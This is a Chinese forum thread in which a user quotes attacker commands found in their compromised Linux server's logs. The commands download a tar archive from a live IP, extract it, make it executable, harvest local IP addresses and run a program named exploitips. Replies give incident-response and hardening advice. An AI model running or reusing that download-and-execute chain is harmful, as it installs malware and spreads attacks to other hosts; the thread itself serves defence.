自己的 Linux 服务器应该被攻击了,看日志查看到以下的执行命令
curl -O 167.235.199.99/.mini/.msq.tar;
tar xvf .msq.tar;
rm -rf .msq.tar ; cd .msq;
chmod +x *;
ip addr > .ipss ;
grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' .ipss > .regexout;
./exploitips
自己的显卡暂时还没有被征用
有大佬知道167.235.199.99/.mini/.msq.tar
压缩包内可执行程序会干什么事情吗?(在虚拟机下尝试)
个人水平差,望赐教! 以及接下来该怎么做呢?重新安装系统?
1
sheeta 2023-04-27 19:26:23 +08:00 1
重装最好
|
2
MoeMoesakura 2023-04-27 19:36:43 +08:00 1
1.去丢在线沙盒里跑
2.建议重装,但是记得先看 last 跟 lastb ,记录一下 IP |
3
JoshuaBen 2023-04-27 19:45:33 +08:00 1
看起来是在横向移动扩散,找内网的其他资产
|
4
CodeCodeStudy 2023-04-27 19:51:12 +08:00 1
好像是尝试用弱口令扫码局域网 IP
|
5
bjzhush 2023-04-27 20:37:45 +08:00 1
|
6
Calen 2023-04-27 21:44:13 +08:00 via iPhone 1
方便问一下您的服务器密码是什么吗?类似的例子就行。
|
7
fantasticlw OP @Calen 因为要给朋友用,所以他们的就和用户名一致😕疏忽了
|
8
1KTN90lKW9gVJ9vX 2023-04-27 23:50:48 +08:00 via Android 1
关机,睡觉。
|
9
namelesswryyy 2023-04-28 00:15:00 +08:00 via Android 1
找运行中的程序位置,有没有奇怪的 path
有专门做 process 名伪装的,能伪装名字但位置能看到 找 crontab 有没有奇怪的定时任务 封掉漏洞后,处理完再观察一段时间 如果还有,可能就是系统文件被替换了 建议把东西移走,重做 但这种情况不太多 |
10
JensenQian 2023-04-28 04:20:57 +08:00 via Android 1
密钥登录,别用密码
|
11
feng0vx 2023-04-28 08:15:40 +08:00 via iPhone 1
重装,换密钥登陆,禁用 root 登陆,密码 uuid 生成
|
12
dode 2023-04-28 09:19:02 +08:00 1
|
13
dode 2023-04-28 09:37:43 +08:00
备份数据,重装系统,禁用 ssh 密码登陆
|
14
xiaoqiao24 2023-04-28 09:56:05 +08:00
@dode 是不是可以添加大写呢 或者加个开关支持大写?
|
15
documentzhangx66 2023-04-28 09:58:01 +08:00
楼主思路完全搞错了。
1.重装。 2.没必要禁用 root ,也没必要换秘钥登录。root 使用至少 16 位复杂密码,包含数字、字符、大小写字母。 3.安装 fail2ban 。 4.常见服务,比如 nginx 、mysql ,不要直接暴露端口到公网,要过一遍防火墙与 WAF 。 5.如果没有防火墙与 WAF ,那就用 WireGuard 给服务器组加密虚拟网络,需要使用服务器的电脑,在 WireGuard 网络里访问服务器。 6.服务器 SSH 端口,要做白名单,仅允许认识的 IP 地址连接。 |
16
dogking2 2023-04-28 10:52:32 +08:00 1
|
17
salmon5 2023-04-28 13:51:42 +08:00
root+至少 20 位的 大小写+数字 随机密码,能避免 99.99%的攻击
|
18
dode 2023-04-28 14:18:35 +08:00
@xiaoqiao24 这是我自用的,代码也很简单,一个 html 文件,你可以存一个自己改,一般要求大写的服务就换一下首个字母,现在浏览器也支持自动生成密码.
|